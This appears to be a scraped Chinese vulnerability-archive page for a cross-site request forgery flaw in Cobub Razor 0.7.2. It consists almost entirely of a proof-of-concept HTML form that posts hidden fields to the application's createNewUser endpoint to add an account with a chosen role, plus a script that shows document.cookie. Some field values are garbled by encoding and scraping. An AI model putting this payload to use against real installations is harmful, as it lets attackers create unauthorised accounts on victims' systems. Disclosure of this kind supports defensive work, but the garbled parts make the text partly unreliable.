Cobub Razor 0.7.2 跨站请求伪造漏洞

POC

<body>
  <script>alert(document.cookie)</script>
    <form action="http://localhost/index.php?/user/createNewUser/" method="POST">
      <input type="hidden" name="username" value="test123" />
      <input type="hidden" name="email" value="email protected" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm_password" value="test" />
      <input type="hidden" name="userrole" value="3" />
      <input type="hidden" name="user/ccreateNewUser" value="�&#136;&#155;�»�" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
POC

相关文章
